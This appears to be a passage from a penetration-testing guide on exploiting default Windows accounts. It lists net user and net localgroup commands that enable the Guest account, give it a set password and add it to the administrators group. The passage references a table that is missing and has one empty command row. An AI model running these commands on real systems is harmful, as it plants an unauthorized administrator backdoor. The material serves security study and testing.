Both Windows and Active Directory ship with a number of default accounts. They cannot be deleted, and have fixed privileges that cannot be removed. Some are disabled by default, but can be enabled. All default accounts have a fixed relative ID (RID) that cannot be changed, even if the account name is changed. This makes them immediately identifiable. Even low-level accounts can be dangerous, because they provide access to the system and can have their privilege escalated. The following table summarizes common ways to exploit default Windows accounts.
Note: For more information on creating Golden tickets, see https://pentestlab.blog/tag/krbtgt, https://pentestlab.blog/2018/04/09/golden-ticket.
Windows Account Manipulation
Accounts (including Guest and DefaultAccount) can be manipulated using the net user and net localgroup commands. Here are some examples. You will need administrator or SYSTEM level privilege to run some of these commands.
To Do This Action:
Run This Command:
List all users
See information about guest
net user guest
Search the status of guest to determine if it's active (enabled) or not
net user guest | findstr /C:"active"
Activate (enable) guest
net user guest /active:yes
Set/change the guest password to Pa22w0rd
net user guest Pa22w0rd
Add guest to the local administrators group
net localgroup administrators /add guest
View the SID of each account
wmic useraccount get name,sid
Note: For information about default accounts/groups and their SID numbers, see https://support.microsoft.com/en-us/help/243330/well-known-security-identifiers-in-windows-operating-systems